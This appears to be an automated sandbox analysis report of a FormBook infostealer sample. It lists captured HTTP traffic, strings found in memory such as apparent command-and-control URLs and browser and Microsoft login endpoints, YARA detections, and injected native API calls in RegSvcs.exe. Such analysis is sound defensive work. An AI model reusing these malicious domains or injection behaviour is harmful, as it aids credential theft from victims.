68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: systray.exe, 00000017.00000002.2512922275.0000000005DA6000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.0000000002E16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: systray.exe, 00000017.00000002.2512922275.00000000060CA000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000313A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: n2pGr8w21V.exe, 00000000.00000002.1373842326.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, uEugNEto.exe, 00000011.00000002.1522692999.00000000030C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duskgazes.work
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duskgazes.work/zs4o/
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systray.exe, 00000017.00000002.2508850216.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033p
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systray.exe, 00000017.00000003.1757735617.00000000083BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042C7C3 NtClose,15_2_0042C7C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2B60 NtClose,LdrInitializeThunk,15_2_015D2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_015D2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_015D2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D35C0 NtCreateMutant,LdrInitializeThunk,15_2_015D35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D4340 NtSetContextThread,15_2_015D4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D4650 NtSuspendThread,15_2_015D4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2BF0 NtAllocateVirtualMemory,15_2_015D2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2BE0 NtQueryValueKey,15_2_015D2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2B80 NtQueryInformationFile,15_2_015D2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2BA0 NtEnumerateValueKey,15_2_015D2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2AD0 NtReadFile,15_2_015D2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2AF0 NtWriteFile,15_2_015D2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2AB0 NtWaitForSingleObject,15_2_015D2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2D10 NtMapViewOfSection,15_2_015D2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2D00 NtSetInformationFile,15_2_015D2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2D30 NtUnmapViewOfSection,15_2_015D2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2DD0 NtDelayExecution,15_2_015D2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2DB0 NtEnumerateKey,15_2_015D2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2C60 NtCreateKey,15_2_015D2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2C00 NtQueryInformationProcess,15_2_015D2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2CC0 NtQueryVirtualMemory,15_2_015D2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2CF0 NtOpenProcess,15_2_015D2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2CA0 NtQueryInformationToken,15_2_015D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2F60 NtCreateProcessEx,15_2_015D2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2F30 NtCreateSection,15_2_015D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2FE0 NtCreateFile,15_2_015D2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2F90 NtProtectVirtualMemory,15_2_015D2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2FB0 NtResumeThread,15_2_015D2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2FA0 NtQuerySection,15_2_015D2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2E30 NtWriteVirtualMemory,15_2_015D2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2EE0 NtQueueApcThread,15_2_015D2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2E80 NtReadVirtualMemory,15_2_015D2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2EA0 NtAdjustPrivilegesToken,15_2_015D2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D3010 NtOpenDirectoryObject,15_2_015D3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D3090 NtSetValueKey,15_2_015D3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D39B0 NtGetContextThread,15_2_015D39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D3D70 NtOpenThread,15_2_015D3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D3D10 NtOpenProcessToken,15_2_015D3D10
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0129D5840_2_0129D584
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_073496F80_2_073496F8
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_07367F700_2_07367F70
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736B7500_2_0736B750
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736D5080_2_0736D508
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736D4F80_2_0736D4F8
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736B3180_2_0736B318
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736B3080_2_0736B308
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_07367F620_2_07367F62
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736AEE00_2_0736AEE0
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeCode function: 0_2_0736BB880_2_0736BB88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004186D315_2_004186D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004168C315_2_004168C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E0C315_2_0040E0C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004100E315_2_004100E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004168BE15_2_004168BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004011B015_2_004011B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E25C15_2_0040E25C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00401A0015_2_00401A00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E20715_2_0040E207
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040E21315_2_0040E213
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402B5015_2_00402B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040435615_2_00404356
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042EDF315_2_0042EDF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040FEC315_2_0040FEC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040269015_2_00402690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402F3015_2_00402F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0162815815_2_01628158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159010015_2_01590100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163A11815_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016581CC15_2_016581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016601AA15_2_016601AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163200015_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165A35215_2_0165A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016603E615_2_016603E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE3F015_2_015AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164027415_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016202C015_2_016202C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A053515_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0166059115_2_01660591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165244615_2_01652446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164442015_2_01644420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164E4F615_2_0164E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C475015_2_015C4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A077015_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159C7C015_2_0159C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BC6E015_2_015BC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B696215_2_015B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0166A9A615_2_0166A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A015_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A284015_2_015A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AA84015_2_015AA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE8F015_2_015CE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015868B815_2_015868B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165AB4015_2_0165AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01656BD715_2_01656BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA8015_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AAD0015_2_015AAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163CD1F15_2_0163CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159ADE015_2_0159ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B8DBF15_2_015B8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0C0015_2_015A0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590CF215_2_01590CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640CB515_2_01640CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01614F4015_2_01614F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01642F3015_2_01642F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C0F3015_2_015C0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E2F2815_2_015E2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01592FC815_2_01592FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015ACFE015_2_015ACFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161EFA015_2_0161EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0E5915_2_015A0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165EE2615_2_0165EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165EEDB15_2_0165EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2E9015_2_015B2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165CE9315_2_0165CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0166B16B15_2_0166B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158F17215_2_0158F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D516C15_2_015D516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AB1B015_2_015AB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165F0E015_2_0165F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016570E915_2_016570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A70C015_2_015A70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164F0CC15_2_0164F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158D34C15_2_0158D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165132D15_2_0165132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E739A15_2_015E739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016412ED15_2_016412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BB2C015_2_015BB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A52A015_2_015A52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165757115_2_01657571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163D5B015_2_0163D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159146015_2_01591460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165F43F15_2_0165F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165F7B015_2_0165F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016516CC15_2_016516CC
